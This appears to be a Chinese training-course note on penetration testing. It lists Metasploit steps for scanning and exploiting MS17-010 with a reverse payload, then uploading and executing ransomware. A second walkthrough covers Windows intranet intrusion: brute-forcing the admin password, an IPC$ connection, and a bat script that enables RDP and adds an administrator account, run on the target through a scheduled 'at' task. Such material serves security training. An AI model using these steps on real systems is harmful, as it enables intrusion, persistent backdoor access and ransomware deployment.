网络安全实训Day16

网络空间安全实训-渗透测试

漏洞扫描

  • 定义

    • 扫描和探测目标范围内的主机存在哪些安全漏洞,或扫描目标范围内的那些主机存在某个指定的漏洞
  • 漏扫工具

    • AWVS

    • APPScan

    • MSF

复制代码
### 使用MSF扫描漏洞并利用

* 1.搜索需要的攻击模块

  * search ms17-010

* 2.使用攻击模块

  * use 模块名称

* 3.设置扫描范围

  * set rhosts 192.168.12.0/24

* 4.设置扫描线程

  * set thread 50

* 5.开始扫描

  * run

* 6.更换攻击模块为漏洞利用

* 7.查看可用攻击载荷

  * show payloads

* 8.设置攻击载荷

  * set payload 攻击载荷名称

* 9.设置被攻击主机IP地址

  * set rhost IP地址

* 10.设置反向连接的控制机IP地址

  * set lhost IP地址

* 11.开始攻击

  * run

* 12.上传病毒

  * upload 本地文件路径 远程主机路径

* 13.执行勒索病毒

  * execute -f 勒索病毒路径

Windows内网渗透

复制代码
#### 1.扫描对方操作系统和开放的端口

* 确定对方是Windows系统开启了445接口
复制代码
#### 2.针对该端口服务暴力破解Windows管理员账号密码
复制代码
#### 3.与对方建立空连接

* net use \\\\对方ip地址\\ipc$

* 需要输入对方的管理员账号密码
复制代码
#### 4.制作开启RDP和创建管理员账户的脚本bat

* REG ADD "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

* net user 用户名 密码 /add

* net local group administrator 用户名 /add
复制代码
#### 5.访问对方C盘默认共享,将bat复制到对方C盘

* 在文件资源管理器地址栏中输入 \\\\对方IP地址\\c$
复制代码
#### 6.查看对方的系统时间

* net time \\\\对方IP地址
复制代码
#### 7.给对方创建任务计划,定时执行BAT程序,开启RDP

* at \\\\对方ip地址 时间 执行的文件路径
复制代码
#### 8.使用先前创建的管理员账号登陆RDP
相关推荐
月阳羊3 分钟前
【硬件-笔试面试题】硬件/电子工程师,笔试面试题-54,(知识点:硬件设计流程)
经验分享·笔记·嵌入式硬件·面试·职场和发展
大阳1232 小时前
数据结构(概念及链表)
c语言·开发语言·数据结构·经验分享·笔记·算法·链表
周先森的怣忈3 小时前
渗透高级-----应急响应
网络安全
我命由我123454 小时前
Windows 操作系统 - Windows 设置始终使用 Windows 照片查看器打开图片
运维·windows·经验分享·笔记·学习·操作系统·运维开发
金宗汉5 小时前
文明存续的时间博弈:论地球资源枯竭临界期的技术突围与行动紧迫性
大数据·人工智能·笔记·算法·观察者模式
X_StarX6 小时前
【Unity笔记04】数据持久化
笔记·unity·游戏引擎·数据存储·数据持久化·大学生
W.KN6 小时前
Spring 学习笔记
笔记·学习·spring
小小洋洋7 小时前
笔记:C语言中指向指针的指针作用
c语言·开发语言·笔记
Virgil1397 小时前
【DL学习笔记】计算图与自动求导
笔记·学习
勤奋的小笼包7 小时前
论文阅读笔记:《Dataset Condensation with Distribution Matching》
论文阅读·人工智能·笔记